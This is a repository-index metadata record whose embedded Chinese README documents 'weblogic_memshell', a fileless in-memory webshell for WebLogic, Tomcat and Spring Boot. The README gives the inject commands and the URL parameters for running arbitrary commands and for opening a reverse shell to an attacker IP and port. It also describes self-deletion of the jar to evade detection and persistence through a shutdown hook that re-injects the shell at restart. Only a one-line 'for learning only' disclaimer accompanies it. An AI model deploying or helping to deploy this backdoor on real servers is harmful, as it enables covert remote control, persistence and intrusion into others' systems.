{"id":13843345,"url":"https://github.com/keven1z/weblogic_memshell","last_synced_at":"2025-07-11T18:31:47.449Z","repository":{"id":40552905,"uuid":"313489690","full_name":"keven1z/weblogic_memshell","owner":"keven1z","description":"适用于weblogic和Tomcat的无文件的内存马(memshell)","archived":false,"fork":false,"pushed_at":"2022-03-04T10:09:06.000Z","size":458,"stargazers_count":264,"open_issues_count":0,"forks_count":25,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-08-05T17:37:06.419Z","etag":null,"topics":["java","memshell","tomcat","weblogic"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/keven1z.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-11-17T02:53:15.000Z","updated_at":"2024-07-25T15:04:21.000Z","dependencies_parsed_at":"2022-08-09T23:00:37.437Z","dependency_job_id":null,"html_url":"https://github.com/keven1z/weblogic_memshell","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/keven1z%2Fweblogic_memshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/keven1z%2Fweblogic_memshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/keven1z%2Fweblogic_memshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/keven1z%2Fweblogic_memshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/keven1z","download_url":"https://codeload.github.com/keven1z/weblogic_memshell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225745588,"owners_count":17517674,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["java","memshell","tomcat","weblogic"],"created_at":"2024-08-04T17:02:00.110Z","updated_at":"2024-11-21T14:31:06.054Z","avatar_url":"https://github.com/keven1z.png","language":"Java","funding_links":[],"categories":["Java"],"sub_categories":[],"readme":"# 说明\n一个基于`javaagent`+`ASM`的无文件落地的javaagent，兼容多种容器(weblogic,Tomcat,Springboot).\n\n# inject jdk要求\n* Java 8\n\n# agent jdk要求\n* Java 6-11\n\n# 兼容版本\n* weblogic 10.3.6\n* weblogic 12.2.1.2\n* weblogic 12.2.1.3\n* weblogic 12.1.3.0\n* Tomcat 8.5.61\n* Spring boot\n\n# 测试平台\n* macos 10.0+\n* centos 7.1\n* windows 10\n* windows 11\n\n# 使用说明\n## inject 参数\n```shell\njava -jar inject.jar [your_password]  # 通用运行\njava -jar inject.jar -p               # 打印所有运行的java进程名\njava -jar inject.jar [your_password] [process_name] # 定向注入到[process_name]\n```\n## 请求参数\n\n```text\n任意url?psw =[your_password]\u0026cmd=[your_cmd]  执行任意命令\n任意url?psw =[your_password]\u0026ip=[attack_ip]\u0026port=[attack_port] 反弹shell\n```\n\n# 测试案例\n运行`java -jar inject-1.0.jar x1001`\n![java](./img/java.png)\n在服务器端可以看到以下，说明注入成功，并删除当前jar包，达到无shell状态：\n![server](./img/server.png)\n访问任意url，带上参数`psw=your_password\u0026cmd=your_cmd`\n![request](./img/request.png)\n当应用关闭时。攻击jar包自动生成到java虚拟机目录下。\n![persist](./img/persist.png)\n下次启动，自动注入达到持久化的效果。\n![persist2](./img/persist2.png)\n\n\u003e 经测试，通过`kill -9`或者`强制结束进程`杀死容器进程，并不会触发`addShutdownHook`,也就不会持久化。\n\u003e网上查询以下几种杀死进程的情况:\n\u003e* 所有的线程已经执行完毕（√）\n\u003e* 调用System.exit()（√）\n\u003e* 用户输入Ctrl+C（√）\n\u003e* 遇到问题异常退出（√）\n\u003e* kill -9 杀掉进程（×）\n\n# 更新\n## 2021/06/19\n* 修改hook点为`javax/servlet/FilterChain`，使其同时兼容tomcat.\n* weblogic注入内存马，现在访问任意url，带上密码和命令即可\n\n## 2021/12/02\n* 简化hook流程\n* 去除大部分打印\n* inject.jar增加自定义hook的进程\n* 增加反弹shell\n\n# 参考\nhttps://github.com/rebeyond/memShell\n\n# 声明\n本项目仅供学习使用，勿做它用\n\n\n\n\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkeven1z%2Fweblogic_memshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkeven1z%2Fweblogic_memshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkeven1z%2Fweblogic_memshell/lists"}